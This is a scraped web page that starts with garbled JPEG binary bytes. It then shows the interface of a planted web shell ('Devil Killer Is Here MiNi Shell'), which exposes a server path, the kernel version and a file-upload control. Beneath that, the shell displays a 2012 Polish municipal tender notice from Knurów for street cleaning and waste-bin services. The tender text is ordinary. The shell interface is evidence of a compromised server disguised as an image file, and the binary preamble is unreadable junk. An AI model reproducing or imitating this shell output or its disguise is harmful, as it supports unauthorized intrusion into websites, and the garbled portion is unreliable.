JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/47230-N-2012.html

<p class="kh_header"><b>Knurów: Utrzymanie czystości na terenie miasta Knurów</b><br>
<b>Numer ogłoszenia: 47230 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 32 3392308, faks 32 2351521, 3392292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości na terenie miasta Knurów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie usług polegających na utrzymaniu czystości na terenie miasta Knurów.
 2.Zakres rzeczowy:
 2.1.Mechaniczne czyszczenie ulic,
 2.2.Opróżnianie koszy ulicznych,
 2.3.Opróżnianie koszy na psie odchody,
 2.4.Utrzymywanie tablic i słupów ogłoszeniowych,
 2.5.Zbieranie rozjechanych zwierząt z dróg administrowanych przez Prezydenta Miasta, 
 2.6.Zakup i zabudowa koszy na śmieci,
 2.7.Zakup i zabudowa koszy na psie odchody,
 2.8.Malowanie konstrukcji tablic ogłoszeniowych,
 2.9.Malowanie konstrukcji słupów ogłoszeniowych,
 2.10.Remont barierek rurowych (prostowanie, czyszczenie, malowanie),
 2.11.Wymiana płyt laminowanych w słupach ogłoszeniowych,
 2.12.Montaż i dostawa słupa ogłoszeniowego,
 2.13.Naprawa i ponowna zabudowa koszy na śmieci,
 2.14.Naprawa lub wymiana w koszach na psie odchody zasobników na pakiety higieniczne lub woreczki,
 2.15.Demontaż zniszczonych koszy lub słupków po koszach,
 2.16.Odchwaszczanie nawierzchni z kostki brukowej,
 2.17.Usuwanie ręczne zanieczyszczeń z chodników i jezdni (liści, błota i innych),
 2.18.Usuwanie zanieczyszczeń z terenów gminnych (liści, błota, śmieci i innych),
 2.19.Likwidacja dzikich wysypisk,
 2.20.Usuwanie wiatrołomów,
 2.21.Odbiór worków z liśćmi w okresie jesieni,
 2.22.Rozwieszenie i zdjęcie flag (na słupach oświetlenia ulicznego lub masztach),
 2.23.Usługi i zabiegi interwencyjne,
 3.Podstawowy zakres usług:
 3.1.Mechaniczne czyszczenie ulic - zgodnie z wykazem wg załącznika nr 1 do wzoru umowy. Częstotliwość czyszczenia ulic ustala się na :
 a)2 razy w tygodniu - 4570 mb (wtorek, piątek);
 b)1 raz w tygodniu - 10550 mb (środa),
 c)2 razy w tygodniu - 17500 mb (wtorek, piątek) - inne drogi na terenie miasta wg potrzeb, usługa realizowana wyłącznie na pisemne wskazanie.
Usługi te wykonywane będą w okresie: od 01.04 - 03.11 każdego roku w okresie obowiązywania umowy (3 x 8 m-cy).
Zamawiający zastrzega sobie prawo zmiany w/w terminów, gdyż wykonanie usług uzależnione jest od terminu zakończenia i rozpoczęcia zimowego utrzymania miasta.
Zamiataniem objęta jest cała długość ulicy wymieniona w harmonogramie oraz znajdujące się na drodze zatoki i wysepki.
Zamiatanie odbywać się będzie przy włączonym i sprawnie działającym systemie zraszającym. 
Każdy stwierdzony przypadek mechanicznego zamiatania ulic bez sprawnie działającego systemu zraszającego spowoduje naliczenie kary umownej.
Na podstawie harmonogramu przeprowadzane będą wyrywkowe kontrole stanu ulic. 
W razie stwierdzenia, że usługa nie została wykonana należycie (ulica nie jest czysta, nie jest pozamiatana prawidłowo, nie jest pozamiatana w całości, pominięto zatoki i wysepki) Wykonawca zostanie obciążony karą finansową określoną w § 7 pkt 2 wzoru umowy.
Obowiązkiem Wykonawcy jest takie pozamiatanie ulicy, w którym stan czystości jezdni nie będzie budził wątpliwości Zleceniodawcy.
Z uwagi na trwającą budowę kanalizacji sanitarnej i deszczowej w drogach gminnych dokładny zakres ulic do zamiatania ustalony zostanie przed przystąpieniem do prac
w protokole przekazania usług i będzie na bieżąco weryfikowany.
 3.2.Opróżnianie koszy ulicznych - 266 szt - zgodnie z wykazem wg załącznika nr 2 do wzoru umowy. Częstotliwość opróżniania koszy ulicznych - 2 razy w tygodniu tj.
w poniedziałki i piątki.
Usługi te wykonywane będą przez cały okres obowiązywania umowy (36 miesięcy).
Do obowiązków Wykonawcy należy opróżnianie koszy, uprzątnięcie terenu wokół kosza i wyzbieranie rozsypanych śmieci.
W przypadku braku w koszach wkładów metalowych Wykonawca zobowiązany jest po każdorazowym opróżnieniu, zastosować w koszach worek foliowy.
Wykonawca umyje dwa razy w roku wszystkie kosze, w terminie uzgodnionym z Zamawiającym (w kwietniu po zakończeniu akcji zima i w październiku przed jej rozpoczęciem).
W terminie do dnia 31.05.2012 r. Wykonawca przemaluje lakierobejcą kosze drewniane zlokalizowane na zieleńcu przy ul. Kopalnianej - Dworcowej w ilości 24 szt. i w parku przy ul. Parkowej w ilości 20 szt.
Na podstawie harmonogramu przeprowadzane będą wyrywkowe kontrole.
W razie stwierdzenia, że usługa nie została wykonana zgodnie z harmonogramem lub należycie (kosz jest nadmiernie przepełniony, rozsypują się z niego śmieci, teren wokół kosza jest zanieczyszczony) Wykonawca zostanie obciążony karą finansową określoną w § 7 pkt 2 wzoru umowy.
 3.3.Opróżnianie koszy służących do zbierania psich odchodów - 30 szt zgodnie
z wykazem wg załącznika nr 3 do wzoru umowy.
Usługi te wykonywane będą przez cały okres obowiązywania umowy (36 miesięcy).
W terminie do dnia 31.05.2012 r. Wykonawca wymieni 12 szt. starych koszy bez zasobników na zestawy higieniczne na kosze opisane w formularzu ofertowym - cenowym.
Częstotliwość opróżniania koszy 2 razy w tygodniu tj. w poniedziałki i piątki.
Do obowiązków Wykonawcy należy opróżnianie koszy i uprzątnięcie terenu wokół kosza.
Wykonawca umyje i wydezynfekuje dwa razy w roku wszystkie kosze (w miesiącach: kwietniu i październiku) oraz na bieżąco wymieni zniszczone kosze lub naprawi uszkodzone tak, aby przez cały okres utrzymywana była stała ilość koszy.
Na podstawie harmonogramu przeprowadzane będą wyrywkowe kontrole.
W razie stwierdzenia, że usługa nie została wykonana należycie (kosz jest  przepełniony, teren wokół kosza jest zanieczyszczony) Wykonawca zostanie obciążony karą finansową określoną w § 7 pkt 2 projektu umowy.
 3.4.Utrzymywanie tablic i słupów ogłoszeniowych - 20 szt zgodnie z wykazem wg załącznika nr 4 do wzoru umowy. 
Sprzątanie terenu w obrębie tablic i słupów ogłoszeniowych - na bieżąco.
Całkowite oczyszczanie tablic i słupów z ogłoszeń - 1 raz w kwartale - w ostatni poniedziałek  miesiąca marca, czerwca, września i grudnia.
Zgłaszanie uszkodzeń w/w nośników informacji i ich naprawa, na podstawie pisemnego wskazania Zamawiającego wg załącznika nr 5 do wzoru umowy.
Usługi te wykonywane będą przez cały okres obowiązywania umowy (36 miesięcy).
Na podstawie harmonogramu przeprowadzane będą wyrywkowe kontrole.
W razie stwierdzenia, że usługa nie została wykonana należycie (teren pod tablicą lub słupem jest zanieczyszczony, nie zostały usunięte ogłoszenia) Wykonawca zostanie obciążony karą finansową określoną w § 7 pkt 2 wzoru umowy.
 3.5.Zbieranie rozjechanych zwierząt z dróg zarządzanych przez Prezydenta Miasta - wg potrzeb (średnio 5 szt/m-c). Czas wykonania - niezwłocznie i każdorazowo do 1 godziny od przyjęcia zgłoszenia telefonicznego ze strony odpowiednich służb: Wydziału GKRiOŚ Urzędu Miasta i Straży Miejskiej w Knurowie.
Usługi te wykonywane będą przez cały okres obowiązywania umowy (36 miesięcy).
Do obowiązków Wykonawcy należy wpisanie do miesięcznego rozliczenia ryczałtowo - ilościowego miejsc z których zostały zebrane rozjechane zwierzęta, data, rodzaj oraz powiadamiający. Spis weryfikowany będzie przez Straż Miejską.
W razie stwierdzenia, iż usługa ta nie została wykonana w powyższym czasie Wykonawca zostanie obciążony karą finansową określoną w § 7 pkt 2 wzoru umowy .
 4.Pozostały zakres usług tj.:
 4.1.Zakup i zabudowa koszy na śmieci,
 4.2.Zakup i zabudowa koszy na psie odchody,
 4.3.Malowanie konstrukcji tablic ogłoszeniowych,
 4.4.Malowanie konstrukcji słupów ogłoszeniowych,
 4.5.Remont barierek rurowych (prostowanie, czyszczenie, malowanie),
 4.6.Wymiana płyt laminowanych na słupach ogłoszeniowych,
 4.7.Montaż i dostawa słupa ogłoszeniowego,
 4.8.Naprawa i ponowna zabudowa koszy na śmieci,
 4.9.Naprawa lub wymiana w koszach na psie odchody zasobników na pakiety higieniczne lub woreczki,
 4.10.Demontaż zniszczonych koszy lub słupków po koszach,
 4.11.Odchwaszczanie nawierzchni z kostki brukowej,
 4.12.Usuwanie ręczne zanieczyszczeń z chodników i jezdni (liści, błota i innych),
 4.13.Usuwanie zanieczyszczeń z terenów gminnych (liści, błota, śmieci i innych),
 4.14.Likwidacja dzikich wysypisk,
 4.15.Usuwanie wiatrołomów,
 4.16.Odbiór worków z liśćmi w okresie jesieni,
 4.17.Rozwieszenie i zdjęcie flag (na słupach oświetlenia ulicznego lub masztach),
 4.18.Usługi i zabiegi interwencyjne
realizowany będzie wyłącznie na podstawie pisemnego wskazania Zamawiającego wg wzoru, który jest załącznikiem nr 5 do wzoru umowy
 5.Wykonawca zobowiązany jest w czasie wykonywania usług do:
 5.1.mechanicznego zamiatania ulic zamiatarką ze sprawnym systemem zraszającym,
 5.2.poruszania się po zieleńcach, chodnikach i ciągach pieszych pojazdem o dopuszczalnej ładowności do 3,5 t,
 5.3.dbałości o należyty stan koszy ulicznych i bezzwłoczne zawiadamianie Zamawiającego o dostrzeżonych uszkodzeniach i kradzieżach oraz o konieczności wymiany koszy,
 5.4.wykonywania wszystkich usług w godzinach i w sposób nie kolidujący z ruchem samochodowym oraz pieszym,
 5.5.wykonywania wszystkich usług w sposób nie stwarzający uciążliwości dla otoczenia. 
 6.Zamawiający zastrzega sobie prawo wprowadzenia zmian w załącznikach nr 1 - 4 do wzoru umowy dotyczących zakresu mechanicznego czyszczenia ulic, opróżniania koszy na śmieci i na psie odchody oraz utrzymywania tablic i słupów ogłoszeniowych.
 7.Harmonogram usług za okres 01.04. - 31.12.2012 r. opracowany na podstawie wytycznych Zamawiającego i obowiązków wyszczególnionych w punkcie 3 niniejszego rozdziału stanowi załącznik nr 6 do wzoru umowy. Harmonogramy na kolejne lata uzgadniane będą do dnia 31.03.2013, 31.03.2014 i 31.03.2015 r. 
 8.Termin realizacji usług:
 8.1.usługi wymienione w pkt. 3 realizowane będą zgodnie z harmonogramem,
 8.2.usługi wymienione w ppkt 4.1 - 4.17 realizowane będą w terminie określonym w pisemnym załączniku nr 5 do wzoru umowy,
 8.3.usługi i zabiegi interwencyjne określone w ppkt 4.18, wskazane przez Zamawiającego telefonicznie, realizowane będą w trybie natychmiastowym, w dniu zgłoszenia. Wykonawca przystąpi do realizacji zadań w ciągu 2 godzin od wezwania Zamawiającego.
 9.Wartość wynagrodzenia za całość usług, o których mowa rozdz. II SIWZ nie przekroczy kwoty 700.000,00 zł brutto w tym w 20012 r. - kwoty 200.000,00 zł brutto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających na podsta­wie art. 67 ust. 1 pkt. 6 pzp realiza­torowi zamówienia zgodnych z przedmiotem zamówie­nia i stanowiących nie więcej niż 10 % jego wartości. 2.Zamówienie, o którym mowa powyżej może zostać udzielone nie później niż w okresie 3 lat od udzielenia zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania się, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, doświadczeniem w wykonaniu co najmniej 1 usługi o wartości min. 80.000,00 zł brutto lub 2 o wartości łącznej 80.000,00 zł brutto, o podobnym charakterze i zakresie do prac objętych przetargiem. Za prace o podobnym charakterze uznaje się usługi polegające na mechanicznym zamiataniu ulic i chodników, opróżnianiu koszy na śmieci, sprzątaniu terenów (parków, zieleńców, terenów miast, zakładów przemysłowych).
Wykonawca może wykazać się usługami wykonywanymi (w trakcie realizacji), w takim przypadku za wartość usługi zostanie przyjęta wartość już zrealizowanej usługi do terminu składania ofert.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedsta­wionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i do­świadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisem­ne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamó­wienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania się dysponowaniem sprzętem gwarantującym rzetelne i sprawne wykonanie usługi, w tym co najmniej:
1.zamiatarką z systemem zraszającym do mechanicznego zamiatania ulic - 1 szt.,
2.pojazdem do transportu odpadów komunalnych, zabezpieczonym przed wysypywaniem i rozwiewaniem odpadów (np. oplandekowanie, nadstawka, nadstawka siatkowa, kontener), o masie całkowitej do 3,5 t - 1 szt (w wykazie narzędzi należy podać sposób zabezpieczenia),
3.piłą spalinową - 1 szt.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedsta­wionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia. 
Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował potencjałem technicznym (sprzętem) niezbędnym do realizacji zamówienia, w szczególności przedstawiając w tym celu pisem­ne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnego zasobu - potencjału technicznego (sprzętu) na okres korzystania z niego przy wykonywaniu zamó­wienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 2. Wykonawca polegający na wiedzy i doświadczeniu lub potencjale technicznym do wykonania zamówienia innych podmiotów przedstawia w oryginale pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę istotnych postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w poniższych przypadkach:
1.Wynagrodzenie należne wykonawcy podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego. W takim przypadku wysokość wynagrodzenia należnego wykonawcy ustalana jest każdorazowo z uwzględnieniem aktualnej stawki podatku VAT obowiązującej na dzień wystawienia faktury.
2.Zakres ulic do mechanicznego zamiatania będzie na bieżąco weryfikowany z uwagi na realizowany na terenie miasta projekt budowy kanalizacji sanitarnej i deszczowej. Wykonawca przed rozpoczęciem nowego m-ca kalendarzowego otrzyma dokładny wykaz ulic, które objęte będą zamiataniem zgodnie z ustalonym w załączniku nr 1 do wzoru umowy harmonogramem.
3.Pozostałe zmiany i warunki zgodnie ze wzorem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 218, w godz. 8:00 - 13:30 lub za zalicz. pocztowym po uiszczeniu opłaty w wys. 10,00 zł na konto zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2012 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. Floriana Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 218, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z wykonawcami są:
1.Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda, tel. 32 339-23-08,
